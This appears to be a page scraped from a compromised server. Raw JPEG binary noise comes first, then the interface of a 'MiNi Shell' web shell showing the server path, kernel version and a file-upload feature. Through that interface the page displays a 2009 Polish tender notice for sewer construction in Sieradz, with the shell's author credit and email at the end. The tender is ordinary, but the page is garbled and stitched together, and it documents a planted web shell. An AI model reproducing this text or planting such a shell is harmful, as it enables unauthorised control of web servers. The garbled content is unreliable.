JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114518-N-2009.html

<p class="kh_header"><b>Sieradz: Budowa kanalizacji sanitarnej w południowej części Miasta Sieradz i Gminy Sieradz</b><br>
<b>Numer ogłoszenia: 114518 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. , ul. Górka Kłocka 14, 98-200 Sieradz, woj. łódzkie, tel. 043 828 62 10, faks 043 828 62 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpwiksieradz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w południowej części Miasta Sieradz i Gminy Sieradz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres kontraktu obejmuje wykonanie sieci kanalizacji sanitarnej - kolektory grawitacyjne oraz rurociągi tłoczne wraz z obiektami na sieci (w tym z przepompowniami) i odcinkami kanalizacji od nitki głównej do granicy nieruchomości:

Zakres kontraktu obejmuje łącznie:
- na terenie Miasta Sieradz:
ZADANIE I - OSIEDLE MONICE.
- Przewód grawitacyjny DN 315 x  9,2 mm                        		 L =  1 817,00 m
- Przewód grawitacyjny DN 200 x  5,9 mm                        		 L =  6 994,00 m
- Przewód grawitacyjny retencyjny DN 800 mm			 L =       83,00 m
- Przewód tłoczny o   110 x  6,6 mm                          		 L =     831,00 m
- Przewód tłoczny o     90 x  5,4 mm			 L =     193,00 m
- Przewód grawitacyjny  DN 160 x 4,7 mm  	   	               L =  1 601,00 m
- Studnie płuczące betonowe o 1500  mm		   	      3 szt
- Studnie rozprężne PEHD o 1000 mm			      1 szt
- Studnie rewizyjne PE o 600 mm				   215 szt
- Studnie rewizyjne betonowe o 1200 mm			     95 szt
- Przepompownie ścieków                                                   	       1 szt
- Tłocznie ścieków					      1 szt
ZADANIE IA - ULICA 1-go MAJA.
- Przewód grawitacyjny DN 200 x  5,9 mm                        	 L =    570,60 m
- Przewód grawitacyjny  DN 160 x 4,7 mm              		 L =    284,50 m
- Studnie rewizyjne PE o 425 mm				      8  szt
- Studnie rewizyjne betonowe o 1000 mm					      5 szt
- Studnie rewizyjne betonowe o 1200 mm					      4 szt
(Miasto Sieradz - w tym zakres kwalifikowany zgodnie z decyzją Komisji Europejskiej: kanalizacja sanitarna grawitacyjna 8.050,75 m, kanalizacja sanitarna ciśnieniowa 800,00 m, pompownie 2 szt.)
- na terenie Gminy Sieradz:
ZADANIE II
Zakres robót do wykonania w ramach skanalizowania miejscowości na terenie Gminy Sieradz. 
a) Dąbrówka Sieradzka - Dąbrowa Wielka.
 - Przewód grawitacyjny DN 315 x  9,2 mm                       	  	 L =      20,00 m
- Przewód grawitacyjny DN 250 x  7,3 mm                        	  	 L =        6,00 m
- Przewód grawitacyjny DN 200 x  5,9 mm                        	  	 L = 5 046,00 m
- Przewód tłoczny o 200 x 11,9 mm			L = 2 983,00 m
- Przewód tłoczny o 110 x 6,6 mm				 L = 2 958,00 m
- Przewód tłoczny o 90 x 5,4 mm				 L =    612,00 m
- Przewód tłoczny o 50 x 3,0 mm				 L =      90,00 m
- Przewód grawitacyjny  DN 200 x 5,9 mm              	             L =       8,00 m
- Przewód grawitacyjny  DN 160 x 4,7 mm              	             L =   731,00 m
- Studnie rewizyjne PE o 425 mm				  105 szt
- Studnie rewizyjne betonowe o 1000 mm 	                        	                38 szt
- Studnie rozprężne betonowe o 1200 mm	                         	                  7  szt
- Studnie z zaworami odpow.- napow. na ruroc. tłocznym betonowe o 800 mm    6  szt
- Przepompownie ścieków                                                  	            4  szt
- Tłocznie ścieków					            1 szt
Zakres robót do wykonania w ramach skanalizowania miejscowości na terenie Gminy Sieradz. 
b) Bogumiłów - Wiechucice.
 - Przewód grawitacyjny DN 250 x  7,3 mm                        	  	 L =    917,00 m
- Przewód grawitacyjny DN 200 x  5,9 mm                        	  	 L = 7 232,00 m
- Przewód tłoczny o 160 x 9,5 mm				 L = 3 889,00 m
- Przewód tłoczny o 90 x 5,4 mm				 L = 1 651,00 m
- Przewód grawitacyjny  DN 160 x 4,7 mm                      	               L =    837,00 m
- Studnie rewizyjne PE o 425 mm					   161 szt
- Studnie rewizyjne betonowe o 1000 mm  		           		                   70 szt
- Studnie rozprężne betonowe o 1200 mm  		           		                  10 szt
- Studnie z zaworami odpow.- napow. na ruroc.  tł. betonowe o 800 mm 	       2 szt
- Przepompownie ścieków                                                           	     13 szt
Zakres robót do wykonania w ramach skanalizowania miejscowości na terenie Gminy Sieradz. 
c) Chojne - Stoczki - Bobrowniki.
 - Przewód grawitacyjny DN 200 x  5,9 mm                       	           L = 13 848,00 m
- Przewód tłoczny o 110 x 6,6 mm			           L =   1 669,00 m
- Przewód tłoczny o 90 x 5,4 mm			           L =   4 209,00 m
- Przewód grawitacyjny  DN 160 x 4,7 mm              	                         L =   1 702,00 m
- Studnie rewizyjne PE o 425 mm					 283 szt
- Studnie rewizyjne betonowe o 1000 mm 	                       		               118 szt
- Studnie rozprężne betonowe o 1200 mm	                       		                 10 szt
- Studnie z zaworami odpow.- napow. na ruroc.  tł. betonowe o 800 mm	     2 szt
- Przepompownie ścieków                                                                                        12 szt 
(Zadanie II - Gmina Sieradz - w tym zakres kwalifikowany zgodnie z decyzją Komisji Europejskiej: kanalizacja sanitarna grawitacyjna 16.255,00 m, kanalizacja sanitarna ciśnieniowa 2.550,00 m, pompownie 11 szt.)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.23-3, 45.23.31.40-2, 45.31.51.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 300.000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu (składają oświadczenie o spełnieniu warunków udziału w postępowaniu wg. wzoru stanowiącego  załącznik nr 2 do IDW) potwierdzone odpowiednimi dokumentami:
Posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 u.p.z.p.

Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):
1) w okresie ostatnich trzech lat obrotowych, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie osiągnąć średnioroczny przychód netto ze sprzedaży w wysokości minimum 
15 000 000 PLN. 
2) Posiadać środki finansowe w wysokości co najmniej 5 000 000 PLN lub posiadać zdolność kredytową w wysokości co najmniej 
5 000 000 PLN; 
3) Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 5 000 000 PLN; 

Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; w szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
1) wykonać w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej:
- 50 km sieci kanalizacyjnych w tym: kanalizację sanitarną grawitacyjną, kanalizację sanitarną ciśnieniową oraz 20 pompowni ścieków
- 1 budowę polegającą na przejściu pod drogą w technologii przecisku lub przewiertu sterowanego,
- zrealizować przynajmniej jedno zadanie inwestycyjne w sektorze gospodarki wodno-ściekowej o wartości robót netto minimum 15 000 000 PLN 
2) posiadać przeciętne zatrudnienie w okresie ostatnich 3 lat od terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,
w wysokości co najmniej 45 pracowników; 
3) wskazać do wykonania niniejszego zamówienia, co najmniej następujące osoby posiadające znajomość języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie (Zamawiający dopuszcza zmianę tego warunku na zatrudnienie na własny koszt przez Wykonawcę tłumaczy języka polskiego), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
1. Ekspert 1 - Przedstawiciel Wykonawcy (Kierownik Kontraktu) posiadający:
	- wykształcenie wyższe,
	- co najmniej 5 lat doświadczenia zawodowego w zarządzaniu kontraktami na roboty jako przedstawiciel Wykonawcy, kierownik projektu lub kierownik budowy, 
w tym, przy co najmniej jednej realizacji kontraktu/zadania z zakresu gospodarki wodno - ściekowej o wartości robót budowlanych minimum 8 000 000 PLN (bez VAT).
2. Ekspert 2 - Kierownik Budowy posiadający:
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i  kanalizacyjnych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami instalacyjnymi w zakresie sieci kanalizacyjnych,
- co najmniej 5 letnie doświadczenie w pełnieniu funkcji Kierownika Budowy.
3. Ekspert 3 - Kierownik Robót Instalacyjno - Sanitarnych posiadający:
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi   w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych                         lub odpowiadające im uprawnienia budowlane, które zostały wydane   na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania  robotami instalacyjnymi w zakresie sieci kanalizacyjnych,
- co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika Budowy    lub Kierownika Robót Instalacyjno - Sanitarnych przy realizacji kontraktów       z zakresu gospodarki wodno - ściekowej.
4. Ekspert 4 - Kierownik Robót Drogowych posiadający:
- uprawnienia do kierowania robotami budowlanymi w specjalności drogowej zgodnie z polskim prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika Budowy lub Kierownika Robót Drogowych.
5. Ekspert 5 - Kierownik Robót Elektrycznych posiadający:
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika Budowy lub Kierownika Robót Elektrycznych przy realizacji kontraktów z zakresu gospodarki wodno - ściekowej.
UWAGA: Funkcję Eksperta 1 i Eksperta 2 może pełnić ta sama osoba..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o niniejsze zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu (składają oświadczenie o spełnieniu warunków udziału w postępowaniu wg. wzoru stanowiącego  załącznik nr 2 do IDW) potwierdzone odpowiednimi dokumentami:
Posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 u.p.z.p.

W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca ubiegający się o udzielenie zamówienia winien złożyć następujące dokumenty: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
d)	składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.P.z.p.

W celu potwierdzenia spełniania warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia Wykonawcy zobowiązani są przedłożyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ww. dokumenty powinno złożyć tylu wykonawców ile będzie to konieczne dla potwierdzenia spełniania warunków udziału w postępowaniu):
1. Rachunek zysków i strat (część sprawozdania finansowego), a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających wielkość przychodów netto ze sprzedaży za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
2. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,  w którym wykonawca posiada rachunek, potwierdzającą posiadanie środków w wymaganej wysokości lub posiadanie przez Wykonawcę zdolność kredytowej w wymaganej wysokości. 
3. Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
Wszelkie wartości podane w innej walucie niż PLN Zamawiający przeliczy na PLN według kursu średniego NBP z dnia ukazania się ogłoszenia dotyczącego niniejszego zamówienia w Dzienniku Urzędowym Unii Europejskiej;


W celu potwierdzenia spełniania warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Wykonawcy zobowiązani są przedłożyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ww. dokumenty powinno złożyć tylu wykonawców ile będzie to konieczne dla potwierdzenia spełniania warunków udziału w postępowaniu):
1. wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego załącznik nr 5 IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
      Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały   wykonane należycie musiały zawierać, co najmniej:
a.	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty których dokumenty dotyczą,
b.	wskazanie podmiotu, na rzecz którego realizowane były roboty,
c.	wskazanie zakresu robót,
d.	wskazanie wartości robót,
e.	wskazanie daty wykonania (rozpoczęcia i zakończenia),
f.	wskazanie miejsca wykonania,
g.	opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że roboty zostały wykonane należycie.
2. Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, sporządzona wg wzoru stanowiącego załącznik nr 3 do IDW,
3.  wykaz osób i podmiotów sporządzony według wzoru stanowiącego załącznik nr 4 do IDW (jeżeli Wykonawca na dzień składania ofert nie dysponuje ww. osobami zdolnymi do wykonania zamówienia musi przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia ww. osób zdolnych do wykonania zamówienia)  oraz dokumenty stwierdzające, że osoby wymienione w załączniku nr 4, które będą wykonywać zamówienie posiadają wymagane uprawnienia budowlane wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego,
Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają uprawnienia w wymaganym zakresie stosownie do wymagań określonych w ogłoszeniu w SIWZ, powinny być zgodne z ustawą z dnia 7 lipca 1994 roku Prawo Budowlane (Dz.U. z 2006 roku nr 156 poz. 1118 ze zm.) oraz aktualnym obowiązującym rozporządzeniem ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. nr 83 z 2006 roku poz.578) lub wydane na podstawie uprzednio obowiązujących przepisów.
Wszelkie wartości podane w innej walucie niż PLN Zamawiający przeliczy na PLN według kursu średniego NBP z dnia ukazania się ogłoszenia dotyczącego niniejszego zamówienia w Dzienniku Urzędowym Unii Europejskiej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpwiksieradz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. ul. Górka Kłocka 14, 98-200 Sieradz, Polska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 09:00, miejsce: sekretariat Miejskiego Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o. ul. Górka Kłocka 14, 98-200 Sieradz, Polska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 90 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kontrakt realizowany jest w ramach projektu UE:  System wodociągowy i kanalizacyjny w Sieradzu 2004/PL/16/C/PE/018 współfinansowanego z Funduszu Spójności UE.
Okres gwarancji jakości wynosi 36 miesięcy dla każdego Odcinka, liczone od daty wydania Świadectwa Przejęcia Odcinka.
Zamawiający przewiduje udzielenie zamówień uzupełniających. Niniejsze zamówienie jest częścią zamówienia, w rozumieniu art. 32 ust 4 u.P.z.p. 
Warunki i sposób płatności za SIWZ:  Kwota 1 108.00 PLN płatna za zaliczeniem pocztowym lub wpłata na konto: 26 1540 1245 2056 4803 3293 0009  z dopiskiem: opłata za udostępnienie dokumentacji przetargowej dla zadania:  Kontrakt 2c Budowa kanalizacji sanitarnej w południowej części Miasta Sieradz i Gminy Sieradz.

Creat By MiNi SheLL
Email: jattceo@gmail.com